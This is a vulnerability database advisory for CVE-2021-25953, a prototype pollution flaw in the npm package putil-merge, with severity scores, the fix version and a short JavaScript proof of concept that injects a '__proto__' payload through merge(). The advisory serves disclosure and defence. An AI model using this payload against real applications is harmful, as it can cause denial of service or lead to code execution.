Mend Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2021-25953

Date: July 14, 2021

Overview

Prototype pollution vulnerability in 'putil-merge' versions1.0.0 through 3.6.6 allows attacker to cause a denial of service and may lead to remote code execution.

Details

The NPM module `putil-merge` can be abused by Prototype Pollution vulnerability since the function `merge()` does not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or be able to manipulate the property which leads to Denial of Service or potentially Remote code execution.

PoC Details

The `merge()` function due to the absence of validation on the values passed into the argument, an attacker can supply a malicious value by adjusting the value to include the `__proto__` property. Since there is no validation before assigning the property to check whether the assigned argument is the Object's own property or not, the property `polluted` will be directly assigned to the new object thereby polluting the Object prototype.

PoC Code

var putil_merge = require("putil-merge")

const payload = JSON.parse('{"__proto__":{"polluted":"Polluted"}}');

var obj = {};

console.log("Before: " + obj.polluted);

putil_merge(obj, payload, {deep:true});

console.log("After: " + obj.polluted);

var obj_new =[]

console.log("obj_new also gets the polluted attribute with the value of " + obj_new.polluted)

Affected Environments

1.0.0 to 3.6.6

Prevention

Upgrade to version 3.7.0

Language: JS

Good to know:

icon
icon

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

CWE-1321
icon

Upgrade Version

Upgrade to version 3.7.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information:

Related Resources (4)

https://github.com/panates/putil-merge/blob/master/lib/merge.js#L59
https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25953
https://nvd.nist.gov/vuln/detail/CVE-2021-25953
https://www.mend.io/vulnerability-database/CVE-2021-25953